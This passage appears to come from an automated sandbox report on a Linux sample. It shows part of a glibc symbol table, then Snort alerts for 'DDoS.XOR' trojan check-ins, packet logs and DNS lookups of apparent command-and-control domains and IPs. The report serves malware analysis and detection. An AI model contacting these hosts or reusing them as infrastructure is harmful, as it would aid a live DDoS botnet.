__getsockname			.symtab	0x806ae00	30	FUNC	<unknown>	DEFAULT	3
__getsockopt			.symtab	0x806ae20	30	FUNC	<unknown>	DEFAULT	3
__gettext_extract_plural			.symtab	0x8078660	266	FUNC	<unknown>	DEFAULT	3
__gettext_free_exp			.symtab	0x8077ad0	523	FUNC	<unknown>	DEFAULT	3
__gettext_germanic_plural			.symtab	0x80c2248	20	OBJECT	<unknown>	DEFAULT	7
__gettextparse			.symtab	0x8077dd0	2186	FUNC	<unknown>	DEFAULT	3
__gettimeofday			.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__gettimeofday_internal			.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__getuid			.symtab	0x808b530	12	FUNC	<unknown>	DEFAULT	3
__gmon_start__			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__guess_grouping			.symtab	0x807f2a0	76	FUNC	<unknown>	DEFAULT	3
__hash_string			.symtab	0x8078770	59	FUNC	<unknown>	DEFAULT	3
__i686.get_pc_thunk.bx			.symtab	0x80af81d	0	FUNC	<unknown>	HIDDEN	3
__i686.get_pc_thunk.cx			.symtab	0x80af819	0	FUNC	<unknown>	HIDDEN	3
__inet_aton			.symtab	0x806b260	343	FUNC	<unknown>	DEFAULT	3
__init_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_misc			.symtab	0x806ac60	78	FUNC	<unknown>	DEFAULT	3
__init_sched_fifo_prio			.symtab	0x8053f80	42	FUNC	<unknown>	DEFAULT	3
__initstate			.symtab	0x8056370	112	FUNC	<unknown>	DEFAULT	3
__initstate_r			.symtab	0x8056780	545	FUNC	<unknown>	DEFAULT	3
__ioctl			.symtab	0x80690f0	33	FUNC	<unknown>	DEFAULT	3
__is_smp			.symtab	0x80d6190	4	OBJECT	<unknown>	DEFAULT	22
__isatty			.symtab	0x808b6e0	34	FUNC	<unknown>	DEFAULT	3
__isinf			.symtab	0x80964d0	64	FUNC	<unknown>	DEFAULT	3
__isinfl			.symtab	0x8096540	85	FUNC	<unknown>	DEFAULT	3
__isnan			.symtab	0x8096510	39	FUNC	<unknown>	DEFAULT	3
__isnanl			.symtab	0x80965a0	69	FUNC	<unknown>	DEFAULT	3
__kill			.symtab	0x8055560	31	FUNC	<unknown>	DEFAULT	3
__lchown			.symtab	0x8068d80	57	FUNC	<unknown>	DEFAULT	3
__libc_alloca_cutoff			.symtab	0x806b010	66	FUNC	<unknown>	DEFAULT	3
__libc_argc			.symtab	0x80d6308	4	OBJECT	<unknown>	DEFAULT	22
__libc_argv			.symtab	0x80d630c	4	OBJECT	<unknown>	DEFAULT	22
__libc_calloc			.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__libc_check_standard_fds			.symtab	0x8054cd0	459	FUNC	<unknown>	DEFAULT	3
__libc_cleanup_routine			.symtab	0x806b060	27	FUNC	<unknown>	DEFAULT	3
__libc_close			.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__libc_connect			.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__libc_csu_fini			.symtab	0x8055120	57	FUNC	<unknown>	DEFAULT	3
__libc_csu_init			.symtab	0x8055160	127	FUNC	<unknown>	DEFAULT	3
__libc_disable_asynccancel			.symtab	0x806b080	50	FUNC	<unknown>	DEFAULT	3
__libc_dlclose			.symtab	0x80945c0	87	FUNC	<unknown>	DEFAULT	3
__libc_dlopen_mode			.symtab	0x8094700	226	FUNC	<unknown>	DEFAULT	3
__libc_dlsym			.symtab	0x8094620	108	FUNC	<unknown>	DEFAULT	3
__libc_dlsym_private			.symtab	0x8094690	108	FUNC	<unknown>	DEFAULT	3
__libc_enable_asynccancel			.symtab	0x806b0c0	98	FUNC	<unknown>	DEFAULT	3
__libc_enable_secure			.symtab	0x80cf140	4	OBJECT	<unknown>	DEFAULT	18
__libc_enable_secure_decided			.symtab	0x80d6304	4	OBJECT	<unknown>	DEFAULT	22
__libc_errno			.symtab	0x14	4	TLS	<unknown>	DEFAULT	14
__libc_fatal			.symtab	0x8059d90	42	FUNC	<unknown>	DEFAULT	3
__libc_fcntl			.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__libc_fork			.symtab	0x8067810	535	FUNC	<unknown>	DEFAULT	3
__libc_free			.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__libc_init_first			.symtab	0x806cba0	133	FUNC	<unknown>	DEFAULT	3
__libc_init_secure			.symtab	0x806cb40	66	FUNC	<unknown>	DEFAULT	3
__libc_longjmp			.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_lseek			.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__libc_lseek64			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__libc_mallinfo			.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__libc_malloc			.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__libc_malloc_initialized			.symtab	0x80cf9f8	4	OBJECT	<unknown>	DEFAULT	21
__libc_mallopt			.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__libc_memalign			.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__libc_message			.symtab	0x8059ad0	691	FUNC	<unknown>	DEFAULT	3
__libc_multiple_libcs			.symtab	0x80cfa4c	4	OBJECT	<unknown>	DEFAULT	21
__libc_nanosleep			.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__libc_open			.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__libc_pause			.symtab	0x8053de0	64	FUNC	<unknown>	DEFAULT	3
__libc_pthread_init			.symtab	0x806b230	45	FUNC	<unknown>	DEFAULT	3
__libc_pvalloc			.symtab	0x80630c0	469	FUNC	<unknown>	DEFAULT	3
__libc_read			.symtab	0x8053a70	91	FUNC	<unknown>	DEFAULT	3
__libc_realloc			.symtab	0x80654c0	1085	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom			.symtab	0x8053c90	87	FUNC	<unknown>	DEFAULT	3
__libc_register_dl_open_hook			.symtab	0x80947f0	125	FUNC	<unknown>	DEFAULT	3
__libc_register_dlfcn_hook			.symtab	0x809e5b0	37	FUNC	<unknown>	DEFAULT	3
__libc_resp			.symtab	0x0	4	TLS	<unknown>	DEFAULT	13
__libc_select			.symtab	0x8069170	115	FUNC	<unknown>	DEFAULT	3
__libc_send			.symtab	0x806ae40	87	FUNC	<unknown>	DEFAULT	3
__libc_sendto			.symtab	0x8053cf0	87	FUNC	<unknown>	DEFAULT	3
__libc_setlocale_lock			.symtab	0x80d58a0	32	OBJECT	<unknown>	DEFAULT	22
__libc_setup_tls			.symtab	0x8054f00	505	FUNC	<unknown>	DEFAULT	3
__libc_sigaction			.symtab	0x8054730	298	FUNC	<unknown>	DEFAULT	3
__libc_siglongjmp			.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_stack_end			.symtab	0x80cf13c	4	OBJECT	<unknown>	DEFAULT	18
__libc_start_main			.symtab	0x80549b0	763	FUNC	<unknown>	DEFAULT	3
__libc_system			.symtab	0x8057a30	104	FUNC	<unknown>	DEFAULT	3
__libc_thread_freeres			.symtab	0x80b2980	33	FUNC	<unknown>	DEFAULT	5
__libc_tsd_CTYPE_B			.symtab	0x18	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOLOWER			.symtab	0x20	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOUPPER			.symtab	0x1c	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_LOCALE			.symtab	0x8	4	TLS	<unknown>	DEFAULT	13
__libc_tsd_MALLOC			.symtab	0x24	4	TLS	<unknown>	DEFAULT	14
__libc_valloc			.symtab	0x80632a0	467	FUNC	<unknown>	DEFAULT	3
__libc_waitpid			.symtab	0x8053e20	91	FUNC	<unknown>	DEFAULT	3
__libc_write			.symtab	0x8053a10	91	FUNC	<unknown>	DEFAULT	3
__libc_writev			.symtab	0x808b980	270	FUNC	<unknown>	DEFAULT	3
__libio_codecvt			.symtab	0x80c2e00	120	OBJECT	<unknown>	DEFAULT	7
__libio_translit			.symtab	0x80c2e78	20	OBJECT	<unknown>	DEFAULT	7
__lll_lock_wait			.symtab	0x8053730	48	FUNC	<unknown>	HIDDEN	3
__lll_lock_wait_private			.symtab	0x8053700	42	FUNC	<unknown>	HIDDEN	3
__lll_robust_lock_wait			.symtab	0x80538e0	81	FUNC	<unknown>	HIDDEN	3
__lll_robust_timedlock_wait			.symtab	0x8053940	201	FUNC	<unknown>	HIDDEN	3
__lll_timedlock_wait			.symtab	0x8053760	173	FUNC	<unknown>	HIDDEN	3
__lll_timedwait_tid			.symtab	0x8053870	112	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake			.symtab	0x8053840	43	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake_private			.symtab	0x8053810	37	FUNC	<unknown>	HIDDEN	3
__llseek			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__localtime_r			.symtab	0x8086e00	34	FUNC	<unknown>	DEFAULT	3
__longjmp			.symtab	0x80553b0	43	FUNC	<unknown>	DEFAULT	3
__lseek			.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__lseek64			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__make_stacks_executable			.symtab	0x8051210	257	FUNC	<unknown>	DEFAULT	3
__mallinfo			.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__malloc			.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__malloc_check_init			.symtab	0x8060000	121	FUNC	<unknown>	DEFAULT	3
__malloc_get_state			.symtab	0x8064180	428	FUNC	<unknown>	DEFAULT	3
__malloc_hook			.symtab	0x80cf9ec	4	OBJECT	<unknown>	DEFAULT	21
__malloc_initialize_hook			.symtab	0x80d4b40	4	OBJECT	<unknown>	DEFAULT	22
__malloc_set_state			.symtab	0x8060dc0	905	FUNC	<unknown>	DEFAULT	3
__malloc_stats			.symtab	0x8060840	529	FUNC	<unknown>	DEFAULT	3
__malloc_trim			.symtab	0x8060bd0	493	FUNC	<unknown>	DEFAULT	3
__malloc_usable_size			.symtab	0x805f010	52	FUNC	<unknown>	DEFAULT	3
__mallopt			.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__mbrlen			.symtab	0x8086500	55	FUNC	<unknown>	DEFAULT	3
__mbrtowc			.symtab	0x8086540	407	FUNC	<unknown>	DEFAULT	3
__mbsnrtowcs			.symtab	0x8086ae0	594	FUNC	<unknown>	DEFAULT	3
__memalign			.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__memalign_hook			.symtab	0x80cf9f4	4	OBJECT	<unknown>	DEFAULT	21
__memchr			.symtab	0x8066760	411	FUNC	<unknown>	DEFAULT	3
__mempcpy			.symtab	0x8066a20	68	FUNC	<unknown>	DEFAULT	3
__mkdir			.symtab	0x8068d60	31	FUNC	<unknown>	DEFAULT	3
__mktime_internal			.symtab	0x809f300	2437	FUNC	<unknown>	DEFAULT	3
__mmap			.symtab	0x8069da0	67	FUNC	<unknown>	DEFAULT	3
__mmap64			.symtab	0x8069df0	88	FUNC	<unknown>	DEFAULT	3
__mon_yday			.symtab	0x80c72c0	52	OBJECT	<unknown>	DEFAULT	7
__morecore			.symtab	0x80cf9e8	4	OBJECT	<unknown>	DEFAULT	21
__mpn_add_n			.symtab	0x80aa690	144	FUNC	<unknown>	DEFAULT	3
__mpn_addmul_1			.symtab	0x80aa720	60	FUNC	<unknown>	DEFAULT	3
__mpn_cmp			.symtab	0x8096b60	92	FUNC	<unknown>	DEFAULT	3
__mpn_construct_double			.symtab	0x80aa7a0	86	FUNC	<unknown>	DEFAULT	3
__mpn_construct_float			.symtab	0x80aa760	49	FUNC	<unknown>	DEFAULT	3
__mpn_construct_long_double			.symtab	0x80aa800	71	FUNC	<unknown>	DEFAULT	3
__mpn_divrem			.symtab	0x8096bc0	1112	FUNC	<unknown>	DEFAULT	3
__mpn_extract_double			.symtab	0x80988b0	244	FUNC	<unknown>	DEFAULT	3
__mpn_extract_long_double			.symtab	0x80989b0	279	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n			.symtab	0x8097670	1989	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n_basecase			.symtab	0x8097570	247	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n			.symtab	0x8097e40	1829	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n_basecase			.symtab	0x8097470	250	FUNC	<unknown>	DEFAULT	3
__mpn_lshift			.symtab	0x8097020	87	FUNC	<unknown>	DEFAULT	3
__mpn_mul			.symtab	0x80970e0	843	FUNC	<unknown>	DEFAULT	3
__mpn_mul_1			.symtab	0x8097430	57	FUNC	<unknown>	DEFAULT	3
__mpn_mul_n			.symtab	0x8098570	620	FUNC	<unknown>	DEFAULT	3
__mpn_rshift			.symtab	0x8097080	87	FUNC	<unknown>	DEFAULT	3
__mpn_sub_n			.symtab	0x80987e0	144	FUNC	<unknown>	DEFAULT	3
__mpn_submul_1			.symtab	0x8098870	60	FUNC	<unknown>	DEFAULT	3
__mprotect			.symtab	0x8069e70	33	FUNC	<unknown>	DEFAULT	3
__mremap			.symtab	0x806add0	45	FUNC	<unknown>	DEFAULT	3
__munmap			.symtab	0x8069e50	31	FUNC	<unknown>	DEFAULT	3
__nanosleep			.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__nanosleep_nocancel			.symtab	0x80677ba	31	FUNC	<unknown>	DEFAULT	3
__new_exitfn			.symtab	0x8056000	274	FUNC	<unknown>	DEFAULT	3
__new_exitfn_called			.symtab	0x80d6240	8	OBJECT	<unknown>	DEFAULT	22
__new_fclose			.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
__new_fopen			.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
__new_getrlimit			.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__new_sem_init			.symtab	0x8053320	84	FUNC	<unknown>	DEFAULT	3
__new_sem_post			.symtab	0x8053420	78	FUNC	<unknown>	DEFAULT	3
__new_sem_wait			.symtab	0x8053380	141	FUNC	<unknown>	DEFAULT	3
__nptl_create_event			.symtab	0x8054700	5	FUNC	<unknown>	DEFAULT	3
__nptl_deallocate_tsd			.symtab	0x8050980	278	FUNC	<unknown>	DEFAULT	3
__nptl_death_event			.symtab	0x8054710	5	FUNC	<unknown>	DEFAULT	3
__nptl_initial_report_events			.symtab	0x80d20cc	1	OBJECT	<unknown>	DEFAULT	22
__nptl_last_event			.symtab	0x80d20c0	4	OBJECT	<unknown>	DEFAULT	22
__nptl_nthreads			.symtab	0x80cf4f0	4	OBJECT	<unknown>	DEFAULT	21
__nptl_setxid			.symtab	0x8050e60	941	FUNC	<unknown>	DEFAULT	3
__nptl_threads_events			.symtab	0x80d20b8	8	OBJECT	<unknown>	DEFAULT	22
__offtime			.symtab	0x809f010	746	FUNC	<unknown>	DEFAULT	3
__open			.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__open_nocancel			.symtab	0x8053d8a	33	FUNC	<unknown>	DEFAULT	3
__opendir			.symtab	0x80672a0	220	FUNC	<unknown>	DEFAULT	3
__overflow			.symtab	0x805d810	41	FUNC	<unknown>	DEFAULT	3
__parse_one_specmb			.symtab	0x8083480	1320	FUNC	<unknown>	DEFAULT	3
__pause_nocancel			.symtab	0x8053dea	19	FUNC	<unknown>	DEFAULT	3
__posix_memalign			.symtab	0x80640d0	111	FUNC	<unknown>	DEFAULT	3
__preinit_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__preinit_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__printf_arginfo_table			.symtab	0x80d63e0	4	OBJECT	<unknown>	DEFAULT	23
__printf_fp			.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
__printf_fphex			.symtab	0x8081b50	6104	FUNC	<unknown>	DEFAULT	3

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.23142.0.138.4143268802021336 10/26/23-20:30:47.799532	TCP	2021336	ET TROJAN DDoS.XOR Checkin via HTTP	43268	80	192.168.2.23	142.0.138.41
192.168.2.23142.0.138.444698615252020381 10/26/23-20:31:08.890920	TCP	2020381	ET TROJAN DDoS.XOR Checkin	46986	1525	192.168.2.23	142.0.138.44

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2023 20:30:47.638590097 CEST	43268	80	192.168.2.23	142.0.138.41
Oct 26, 2023 20:30:47.649913073 CEST	54826	1525	192.168.2.23	34.98.99.30
Oct 26, 2023 20:30:47.787046909 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2023 20:30:47.798882008 CEST	80	43268	142.0.138.41	192.168.2.23
Oct 26, 2023 20:30:47.798933983 CEST	43268	80	192.168.2.23	142.0.138.41
Oct 26, 2023 20:30:47.799531937 CEST	43268	80	192.168.2.23	142.0.138.41
Oct 26, 2023 20:30:47.959801912 CEST	80	43268	142.0.138.41	192.168.2.23
Oct 26, 2023 20:30:47.961174011 CEST	43268	80	192.168.2.23	142.0.138.41
Oct 26, 2023 20:30:48.121442080 CEST	80	43268	142.0.138.41	192.168.2.23
Oct 26, 2023 20:30:48.650912046 CEST	54826	1525	192.168.2.23	34.98.99.30
Oct 26, 2023 20:30:50.666712999 CEST	54826	1525	192.168.2.23	34.98.99.30
Oct 26, 2023 20:30:52.972816944 CEST	55566	1525	192.168.2.23	192.74.236.35
Oct 26, 2023 20:30:53.418457031 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2023 20:30:53.994735003 CEST	55566	1525	192.168.2.23	192.74.236.35
Oct 26, 2023 20:30:54.698065042 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 26, 2023 20:30:56.009947062 CEST	55566	1525	192.168.2.23	192.74.236.35
Oct 26, 2023 20:30:58.085453033 CEST	39860	1525	192.168.2.23	142.4.106.74
Oct 26, 2023 20:30:59.113511086 CEST	39860	1525	192.168.2.23	142.4.106.74
Oct 26, 2023 20:31:01.129153967 CEST	39860	1525	192.168.2.23	142.4.106.74
Oct 26, 2023 20:31:03.195419073 CEST	54834	1525	192.168.2.23	34.98.99.30
Oct 26, 2023 20:31:04.200782061 CEST	54834	1525	192.168.2.23	34.98.99.30
Oct 26, 2023 20:31:06.216429949 CEST	54834	1525	192.168.2.23	34.98.99.30
Oct 26, 2023 20:31:08.264247894 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2023 20:31:08.506274939 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:08.666691065 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:08.666851997 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:08.675585032 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:08.890678883 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:08.890919924 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:09.051031113 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:09.051240921 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:19.220221996 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:19.220467091 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:20.550487041 CEST	42836	443	192.168.2.23	91.189.91.43
Oct 26, 2023 20:31:24.645837069 CEST	42516	80	192.168.2.23	109.202.202.202
Oct 26, 2023 20:31:28.598973036 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:28.599102974 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:38.769171953 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:38.769468069 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:48.942140102 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:48.942369938 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:31:49.218413115 CEST	43928	443	192.168.2.23	91.189.91.42
Oct 26, 2023 20:31:59.116544962 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:31:59.116610050 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:32:04.009221077 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:32:04.009299994 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:32:14.183406115 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:32:14.183491945 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:32:24.352386951 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:32:24.352648973 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:32:34.526380062 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:32:34.526607990 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:32:39.450508118 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:32:39.450839043 CEST	46986	1525	192.168.2.23	142.0.138.44
Oct 26, 2023 20:32:49.620702028 CEST	1525	46986	142.0.138.44	192.168.2.23
Oct 26, 2023 20:32:49.620836973 CEST	46986	1525	192.168.2.23	142.0.138.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2023 20:30:47.533155918 CEST	49705	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:30:47.544496059 CEST	49014	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:30:47.638472080 CEST	53	49705	8.8.8.8	192.168.2.23
Oct 26, 2023 20:30:47.649831057 CEST	53	49014	8.8.8.8	192.168.2.23
Oct 26, 2023 20:30:52.650373936 CEST	36902	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:30:52.759440899 CEST	53	36902	8.8.8.8	192.168.2.23
Oct 26, 2023 20:30:52.759553909 CEST	38111	53	192.168.2.23	8.8.4.4
Oct 26, 2023 20:30:52.867166042 CEST	53	38111	8.8.4.4	192.168.2.23
Oct 26, 2023 20:30:52.867321968 CEST	41571	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:30:52.972693920 CEST	53	41571	8.8.8.8	192.168.2.23
Oct 26, 2023 20:30:57.977235079 CEST	54384	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:30:58.085293055 CEST	53	54384	8.8.8.8	192.168.2.23
Oct 26, 2023 20:31:03.090017080 CEST	57893	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:31:03.195225000 CEST	53	57893	8.8.8.8	192.168.2.23
Oct 26, 2023 20:31:08.199086905 CEST	33218	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:31:08.297816992 CEST	53	33218	8.8.8.8	192.168.2.23
Oct 26, 2023 20:31:08.298120975 CEST	59439	53	192.168.2.23	8.8.4.4
Oct 26, 2023 20:31:08.403337002 CEST	53	59439	8.8.4.4	192.168.2.23
Oct 26, 2023 20:31:08.403851032 CEST	39960	53	192.168.2.23	8.8.8.8
Oct 26, 2023 20:31:08.505925894 CEST	53	39960	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2023 20:30:47.533155918 CEST	192.168.2.23	8.8.8.8	0x78fd	Standard query (0)	www1.gggatat456.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:47.544496059 CEST	192.168.2.23	8.8.8.8	0xe39d	Standard query (0)	p5.lpjulidny7.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.650373936 CEST	192.168.2.23	8.8.8.8	0x410b	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.759553909 CEST	192.168.2.23	8.8.4.4	0xe256	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.867321968 CEST	192.168.2.23	8.8.8.8	0xbb43	Standard query (0)	ppp.xxxatat456.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:57.977235079 CEST	192.168.2.23	8.8.8.8	0x18b2	Standard query (0)	ppp.gggatat456.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:03.090017080 CEST	192.168.2.23	8.8.8.8	0x3214	Standard query (0)	p5.lpjulidny7.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.199086905 CEST	192.168.2.23	8.8.8.8	0x90ea	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.298120975 CEST	192.168.2.23	8.8.4.4	0x11b1	Standard query (0)	p5.dddgata789.com	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.403851032 CEST	192.168.2.23	8.8.8.8	0x829c	Standard query (0)	ppp.xxxatat456.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2023 20:30:47.638472080 CEST	8.8.8.8	192.168.2.23	0x78fd	No error (0)	www1.gggatat456.com		142.0.138.41	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:47.649831057 CEST	8.8.8.8	192.168.2.23	0xe39d	No error (0)	p5.lpjulidny7.com		34.98.99.30	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.759440899 CEST	8.8.8.8	192.168.2.23	0x410b	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.867166042 CEST	8.8.4.4	192.168.2.23	0xe256	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.972693920 CEST	8.8.8.8	192.168.2.23	0xbb43	No error (0)	ppp.xxxatat456.com		192.74.236.35	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.972693920 CEST	8.8.8.8	192.168.2.23	0xbb43	No error (0)	ppp.xxxatat456.com		142.4.106.75	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.972693920 CEST	8.8.8.8	192.168.2.23	0xbb43	No error (0)	ppp.xxxatat456.com		142.4.106.73	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.972693920 CEST	8.8.8.8	192.168.2.23	0xbb43	No error (0)	ppp.xxxatat456.com		142.0.138.44	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.972693920 CEST	8.8.8.8	192.168.2.23	0xbb43	No error (0)	ppp.xxxatat456.com		142.0.138.42	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:52.972693920 CEST	8.8.8.8	192.168.2.23	0xbb43	No error (0)	ppp.xxxatat456.com		192.74.236.33	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:58.085293055 CEST	8.8.8.8	192.168.2.23	0x18b2	No error (0)	ppp.gggatat456.com		142.4.106.74	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:58.085293055 CEST	8.8.8.8	192.168.2.23	0x18b2	No error (0)	ppp.gggatat456.com		192.74.236.36	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:58.085293055 CEST	8.8.8.8	192.168.2.23	0x18b2	No error (0)	ppp.gggatat456.com		142.0.138.43	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:58.085293055 CEST	8.8.8.8	192.168.2.23	0x18b2	No error (0)	ppp.gggatat456.com		142.4.106.76	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:58.085293055 CEST	8.8.8.8	192.168.2.23	0x18b2	No error (0)	ppp.gggatat456.com		142.0.138.41	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:30:58.085293055 CEST	8.8.8.8	192.168.2.23	0x18b2	No error (0)	ppp.gggatat456.com		192.74.236.34	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:03.195225000 CEST	8.8.8.8	192.168.2.23	0x3214	No error (0)	p5.lpjulidny7.com		34.98.99.30	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.297816992 CEST	8.8.8.8	192.168.2.23	0x90ea	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.403337002 CEST	8.8.4.4	192.168.2.23	0x11b1	Name error (3)	p5.dddgata789.com	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.505925894 CEST	8.8.8.8	192.168.2.23	0x829c	No error (0)	ppp.xxxatat456.com		142.0.138.44	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.505925894 CEST	8.8.8.8	192.168.2.23	0x829c	No error (0)	ppp.xxxatat456.com		142.4.106.73	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.505925894 CEST	8.8.8.8	192.168.2.23	0x829c	No error (0)	ppp.xxxatat456.com		192.74.236.33	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.505925894 CEST	8.8.8.8	192.168.2.23	0x829c	No error (0)	ppp.xxxatat456.com		142.0.138.42	A (IP address)	IN (0x0001)	false
